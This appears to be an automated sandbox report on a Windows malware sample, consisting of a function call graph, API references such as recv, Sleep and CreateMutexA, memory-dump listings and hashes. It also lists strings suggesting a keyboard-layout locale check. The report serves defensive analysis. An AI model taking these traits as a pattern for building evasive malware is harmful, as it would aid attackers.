bc2424 13589->13590 13597 bdb52d 13590->13597 13594 bc381c 13593->13594 13646 bc2440 13594->13646 13605 bf3aed 13597->13605 13599 bdb5a5 ___std_exception_copy 13612 bdb1ad 13599->13612 13600 bdb598 13608 bdaf56 13600->13608 13604 bc242a 13604->13584 13616 bf4f29 13605->13616 13607 bdb555 13607->13599 13607->13600 13607->13604 13609 bdaf9f ___std_exception_copy 13608->13609 13611 bdafb2 shared_ptr 13609->13611 13622 bdb39f 13609->13622 13611->13604 13613 bdb1d8 13612->13613 13615 bdb1e1 shared_ptr 13612->13615 13614 bdb39f 5 API calls 13613->13614 13614->13615 13615->13604 13617 bf4f2e __cftof 13616->13617 13617->13607 13618 bfd634 __cftof 4 API calls 13617->13618 13621 bf8bfc __cftof 13617->13621 13618->13621 13619 bf65ed __cftof 3 API calls 13620 bf8c2f 13619->13620 13621->13619 13633 bdbedf 13622->13633 13625 bdb3e8 13625->13611 13642 bdcc31 13633->13642 13636 bf6cbb 13637 bf6cc7 __cftof 13636->13637 13638 bfa671 __cftof 4 API calls 13637->13638 13639 bf6ccc 13638->13639 13640 bf8bec __cftof 4 API calls 13639->13640 13641 bf6cf6 13640->13641 13643 bdcc3f InitOnceExecuteOnce 13642->13643 13645 bdb3e1 13642->13645 13643->13645 13645->13625 13645->13636 13649 bdb5d6 13646->13649 13648 bc2472 13650 bdb5f1 std::_Throw_future_error 13649->13650 13651 bdb658 __cftof std::future_error::future_error 13650->13651 13652 bf8bec __cftof 4 API calls 13650->13652 13651->13648 13653 bdb69f 13652->13653 14283 bc9f44 14284 bc9f4c shared_ptr 14283->14284 14285 bca953 Sleep CreateMutexA 14284->14285 14286 bca01f shared_ptr 14284->14286 14287 bca98e 14285->14287 13658 bdd0c7 13660 bdd0d6 13658->13660 13659 bdd17f 13660->13659 13661 bdd17b RtlWakeAllConditionVariable 13660->13661 13719 bc3c47 13720 bc3c51 13719->13720 13723 bc3c5f 13720->13723 13726 bc32d0 13720->13726 13721 bc3c68 13723->13721 13724 bc3810 4 API calls 13723->13724 13725 bc3cdb 13724->13725 13727 bdc6ac GetSystemTimePreciseAsFileTime 13726->13727 13733 bc3314 13727->13733 13728 bc336b 13729 bdc26a 5 API calls 13728->13729 13731 bc333c __Mtx_unlock 13729->13731 13732 bdc26a 5 API calls 13731->13732 13734 bc3350 std::future_error::future_error 13731->13734 13735 bc3377 13732->13735 13733->13728 13733->13731 13745 bdbd4c 13733->13745 13734->13723 13736 bdc6ac GetSystemTimePreciseAsFileTime 13735->13736 13737 bc33af 13736->13737 13738 bdc26a 5 API calls 13737->13738 13739 bc33b6 __Cnd_broadcast 13737->13739 13738->13739 13740 bdc26a 5 API calls 13739->13740 13741 bc33d7 __Mtx_unlock 13739->13741 13740->13741 13742 bdc26a 5 API calls 13741->13742 13744 bc33eb 13741->13744 13743 bc340e 13742->13743 13743->13723 13744->13723 13748 bdbb72 13745->13748 13747 bdbd5c 13747->13733 13749 bdbb9c 13748->13749 13750 bdcf6b _xtime_get GetSystemTimePreciseAsFileTime 13749->13750 13751 bdbba4 __Xtime_diff_to_millis2 std::future_error::future_error 13749->13751 13752 bdbbcf __Xtime_diff_to_millis2 13750->13752 13751->13747 13752->13751 13753 bdcf6b _xtime_get GetSystemTimePreciseAsFileTime 13752->13753 13753->13751 13928 bf6a44 13929 bf6a5c 13928->13929 13930 bf6a52 13928->13930 13933 bf698d 13929->13933 13932 bf6a76 __freea 13934 bf690a __cftof 4 API calls 13933->13934 13935 bf699f 13934->13935 13935->13932 13501 bc8780 13502 bc8786 13501->13502 13508 bf6729 13502->13508 13505 bc87a6 13507 bc87a0 13515 bf6672 13508->13515 13510 bc8793 13510->13505 13511 bf67b7 13510->13511 13512 bf67c3 __cftof 13511->13512 13514 bf67cd __cftof 13512->13514 13527 bf6740 13512->13527 13514->13507 13517 bf667e __cftof 13515->13517 13516 bf6685 __cftof 13516->13510 13517->13516 13519 bfa8c3 13517->13519 13520 bfa8cf __cftof 13519->13520 13523 bfa967 13520->13523 13522 bfa8ea 13522->13516 13525 bfa98a 13523->13525 13524 bfd82f __cftof RtlAllocateHeap 13526 bfa9d0 __freea 13524->13526 13525->13524 13525->13526 13526->13522 13528 bf6762 13527->13528 13530 bf674d __cftof __freea 13527->13530 13528->13530 13531 bfa038 13528->13531 13530->13514 13532 bfa050 13531->13532 13534 bfa075 13531->13534 13532->13534 13535 c00439 13532->13535 13534->13530 13536 c00445 __cftof 13535->13536 13538 c0044d __cftof __dosmaperr 13536->13538 13539 c0052b 13536->13539 13538->13534 13540 c0054d 13539->13540 13544 c00551 __cftof __dosmaperr 13539->13544 13540->13544 13545 c000d2 13540->13545 13544->13538 13547 c000e3 13545->13547 13546 c00106 13546->13544 13549 bffcc0 13546->13549 13547->13546 13548 bfa671 __cftof 4 API calls 13547->13548 13548->13546 13550 bffd0d 13549->13550 13551 bf690a __cftof 4 API calls 13550->13551 13555 bffd1c __cftof 13551->13555 13552 bfffbc std::future_error::future_error 13552->13544 13553 bfb67d 4 API calls 13553->13555 13554 bfc719 GetPEB ExitProcess GetPEB RtlAllocateHeap __fassign 13554->13555 13555->13552 13555->13553 13555->13554 13662 bc20c0 13663 bdc68b __Mtx_init_in_situ 2 API calls 13662->13663 13664 bc20cc 13663->13664 13665 bce0c0 recv 13666 bce122 recv 13665->13666 13667 bce157 recv 13666->13667 13668 bce191 13667->13668 13669 bce2b3 std::future_error::future_error 13668->13669 13674 bdc6ac 13668->13674 13681 bdc452 13674->13681 13676 bce2ee 13677 bdc26a 13676->13677 13678 bdc292 13677->13678 13679 bdc274 13677->13679 13678->13678 13679->13678 13698 bdc297 13679->13698 13682 bdc4a8 13681->13682 13684 bdc47a std::future_error::future_error 13681->13684 13682->13684 13687 bdcf6b 13682->13687 13684->13676 13685 bdc4fd __Xtime_diff_to_millis2 13685->13684 13686 bdcf6b _xtime_get GetSystemTimePreciseAsFileTime 13685->13686 13686->13685 13688 bdcf7a 13687->13688 13690 bdcf87 __aulldvrm 13687->13690 13688->13690 13691 bdcf44 13688->13691 13690->13685 13694 bdcbea 13691->13694 13695 bdcbfb GetSystemTimePreciseAsFileTime 13694->13695 13696 bdcc07 13694->13696 13695->13696 13696->13690 13701 bc2ae0 13698->13701 13700 bdc2ae std::_Throw_future_error 13702 bdbedf InitOnceExecuteOnce 13701->13702 13704 bc2af4 __cftof 13702->13704 13703 bc2aff 13703->13700 13704->13703 13705 bfa671 __cftof 4 API calls 13704->13705 13708 bf6ccc 13705->13708 13706 bf8bec __cftof 4 API calls 13707 bf6cf6 13706->13707 13708->13706 13759 bc8980 13761 bc8aea 13759->13761 13762 bc89d8 shared_ptr 13759->13762 13760 bc5c10 6 API calls 13760->13762 13762->13760 13762->13761 13921 bc2e00 13922 bc2e28 13921->13922 13923 bdc68b __Mtx_init_in_situ 2 API calls 13922->13923 13924 bc2e33 13923->13924
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • ExitProcess.KERNEL32(?,?,00BF652A,?,?,?,?,?,00BF7661), ref: 00BF6567
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1720616098.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720596880.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720616098.0000000000C22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720688459.0000000000C29000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720708320.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720728683.0000000000C35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720747541.0000000000C36000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720766956.0000000000C37000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720894988.0000000000D94000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720917073.0000000000D96000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720944333.0000000000DA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720964524.0000000000DAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720984505.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720984505.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721021913.0000000000DB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721045219.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721064010.0000000000DBE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721083619.0000000000DC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721103230.0000000000DC9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721122511.0000000000DCB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721142328.0000000000DCC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721165654.0000000000DD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721193761.0000000000DE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721213381.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721236438.0000000000DE6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721256792.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721280507.0000000000DF0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721301049.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721329366.0000000000E0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721351970.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721374309.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721398668.0000000000E1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721419247.0000000000E1D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721441285.0000000000E22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721461282.0000000000E23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721482677.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721510508.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721532631.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721557120.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721577134.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721601398.0000000000E38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721621714.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721641509.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721662290.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721683973.0000000000E4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721702825.0000000000E4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721727208.0000000000E57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721750889.0000000000E5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721775954.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721796913.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721817513.0000000000E6E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721838706.0000000000E70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721872195.0000000000E8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721893699.0000000000E90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721893699.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721939800.0000000000EC8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721966257.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721986621.0000000000ECA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1722010599.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1722030765.0000000000ED0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1722052434.0000000000EDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1722076202.0000000000EDF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ExitProcess
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 621844428-0
                                                                                                                                                                                                                                                              • Opcode ID: 9675a86dbe6bc60c826caae8da154d5956cc0232e1665ac4b83e4a9e8cb17dc2
                                                                                                                                                                                                                                                              • Instruction ID: b57f12a465112a432033ec37bb78e699f46f5d638fe856fdbb04afa81482cb69
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9675a86dbe6bc60c826caae8da154d5956cc0232e1665ac4b83e4a9e8cb17dc2
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2CE08C3005110CAFCF35BB58C819D6C3BA9EFA1749F106860FE18A7226CB35EE81C680
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1723680323.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4990000_file.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 0812f90c6c2bb027f0a012fde981bc506a7698054b17e3cd3d4ac765ae8646ef
                                                                                                                                                                                                                                                              • Instruction ID: 264cbce772f751b2f4d42314e565bccf69de96385cde96e7ecdcd184dfb2e433
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0812f90c6c2bb027f0a012fde981bc506a7698054b17e3cd3d4ac765ae8646ef
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 39F02BEB20C3216D290198AA6759AF73ADFD4C2A30339CD37F453CA815F2553D4A54B1

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1720616098.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720596880.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720616098.0000000000C22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720688459.0000000000C29000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720708320.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720728683.0000000000C35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720747541.0000000000C36000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720766956.0000000000C37000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720894988.0000000000D94000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720917073.0000000000D96000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720944333.0000000000DA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720964524.0000000000DAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720984505.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720984505.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721021913.0000000000DB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721045219.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721064010.0000000000DBE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721083619.0000000000DC0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721103230.0000000000DC9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721122511.0000000000DCB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721142328.0000000000DCC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721165654.0000000000DD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721193761.0000000000DE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721213381.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721236438.0000000000DE6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721256792.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721280507.0000000000DF0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721301049.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721329366.0000000000E0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721351970.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721374309.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721398668.0000000000E1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721419247.0000000000E1D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721441285.0000000000E22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721461282.0000000000E23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721482677.0000000000E29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721510508.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721532631.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721557120.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721577134.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721601398.0000000000E38000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721621714.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721641509.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721662290.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721683973.0000000000E4E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721702825.0000000000E4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721727208.0000000000E57000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721750889.0000000000E5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721775954.0000000000E6A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721796913.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721817513.0000000000E6E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721838706.0000000000E70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721872195.0000000000E8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721893699.0000000000E90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721893699.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721939800.0000000000EC8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721966257.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1721986621.0000000000ECA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1722010599.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1722030765.0000000000ED0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1722052434.0000000000EDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1722076202.0000000000EDF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                                                                                                                                                                                                                                                              • API String ID: 0-3963862150
                                                                                                                                                                                                                                                              • Opcode ID: 280f7b665e4d648ccf9a643d6a57b63ee476684c30123dd24c16411a2ddb1e45
                                                                                                                                                                                                                                                              • Instruction ID: 4f073641147298a938af11c044fbfb0600ada352341a5586e09c2e43775b513d
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 280f7b665e4d648ccf9a643d6a57b63ee476684c30123dd24c16411a2ddb1e45
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A4F1D27090025CABEB24DF54CC85FDEBBB9EB45304F5042E9E509A7281DB74AA88CB94

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 185 bc9ba5-bc9d91 call bd7a00 call bc5c10 call bc8b30 call bd8220
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 00BCA963
                                                                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00C23254), ref: 00BCA981
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1720616098.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720596880.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720616098.0000000000C22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720688459.0000000000C29000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720708320.0000000000C2B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720728683.0000000000C35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720747541.0000000000C36000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720766956.0000000000C37000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720894988.0000000000D94000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720917073.0000000000D96000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720944333.0000000000DA8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720964524.0000000000DAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1720984505.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
